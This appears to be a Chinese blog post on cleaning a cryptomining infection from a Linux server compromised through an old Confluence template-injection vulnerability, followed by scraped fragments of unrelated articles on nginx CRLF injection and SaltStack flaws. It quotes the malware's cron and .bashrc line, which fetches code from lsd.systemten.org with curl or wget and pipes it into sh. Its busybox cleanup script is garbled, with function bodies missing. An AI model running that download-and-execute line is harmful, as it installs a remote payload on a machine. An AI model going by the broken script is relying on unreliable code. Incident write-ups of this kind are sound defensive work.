7.17凌晨1點左右,突然接收到伺服器報警cpu達到100%,負載飆高,tcp連線數明顯突增,部分業務無法正常訪問。
緊急登入伺服器進行排查,top發現polkitds占用大量cpu,kill程序後,隔了幾分鐘cpu再次飆高,last,w等命令無法正常使用,懷疑受到病毒攻擊,排查crontab時發現如下計畫任務且刪除無效,同時.bashrc也發現相同命令:
*/15 * * * * (curl -fssl lsd.systemten.org|wget -q -o- lsd.systemten.org)|sh ##
查詢發現lsd.systemten.org是乙個挖礦**,故確定中了挖礦病毒
參考:
cd busybox-1.30.1/
make defconfig
make
make install
ln -s `pwd`/busybox /usr/bin/busybox
busybox|grep busybox |grep v
編寫busybox修復指令碼
#!/bin/bash
#可以重複執行幾次,防止互相拉起導致刪除失敗
function installbusybox()
function banhosts()
function fixcron()
function killprocess()' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null
busybox ps -ef | busybox grep -v grep | busybox grep 'khugepageds' | busybox awk '' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null
busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null
busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null
busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null
busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null
busybox rm -f /tmp/khugepageds
busybox rm -f /usr/sbin/kerberods
busybox rm -f /usr/sbin/kthrotlds
busybox rm -f /usr/sbin/kintegrityds
busybox rm -f /usr/sbin/kpsmouseds
busybox find /tmp -mtime -4 -type f | busybox xargs busybox rm -rf
}function clearlib()
function clearinit()
function recoverok()
#先停止crontab服務
service crond stop
#防止病毒繼續擴散
banhosts
#清除lib劫持
clearlib
#修復crontab
fixcron
killprocess
clearlib
killprocess
#刪除異常開機項
clearinit
fixcron
recoverok
如果查殺不成功,重複進行多次查殺,盡量在短時間內完成所有操作並重啟,防止病毒利用已載入的動態鏈結庫恢復感染!!!
參考:通過查詢發現confluence最近發布乙個新的漏洞,confluence server與confluence資料中心中的widget聯結器存在服務端模板注入漏洞,攻擊者能利用此漏洞能夠實現目錄穿越與遠端**執行。
涉及版本:影響版本6.6.7之前的所有版本的confluence server和confluence資料中心,6.8.5之前的版本6.7.0(6.8.x的固定版本),6.9.3之前的6.9.0版本(6.9的固定版本)
伺服器上安裝了confluence-6.8.1,導致此次挖礦病毒入侵
1.定期檢視已安裝的軟體是否發布漏洞警告,及時公升級版本或補丁
2.謹慎使用免密登入
3.禁止root登入,在特殊需求下再開啟
Nginx 配置錯誤導致漏洞
crlf是 回車 換行 r n 的簡稱,即我們都知道在http協議中,http header與http body是用兩個crlf分隔的,瀏覽器就是根據這兩個crlf來提取http 內容 一旦我們能夠控制http頭,通過注入一些crlf這樣就可以控制header和body的分割線,這樣我們就可以向bo...
Nginx 配置錯誤導致漏洞
好好學習,天天向上 由於一些不安全的配置引起的漏洞 無這裡使用1版本 使用vulhub 使用docker啟動 docker compose build docker compose up d 執行成功後,nginx將會監聽8080 8081 8082三個埠,分別對應三種漏洞。nginx會將 uri進...
手工清除Saltstack漏洞導致的挖礦病毒
saltstack是基於python開發的一套c s自動化運維工具。近日,saltstack被爆存在認證繞過漏洞 cve 2020 11651 和目錄遍歷漏洞 cve 2020 11652 其中 cve 2020 11652 為目錄遍歷漏洞,攻擊者可構造惡意請求,讀取伺服器上任意檔案,獲取系統敏感資...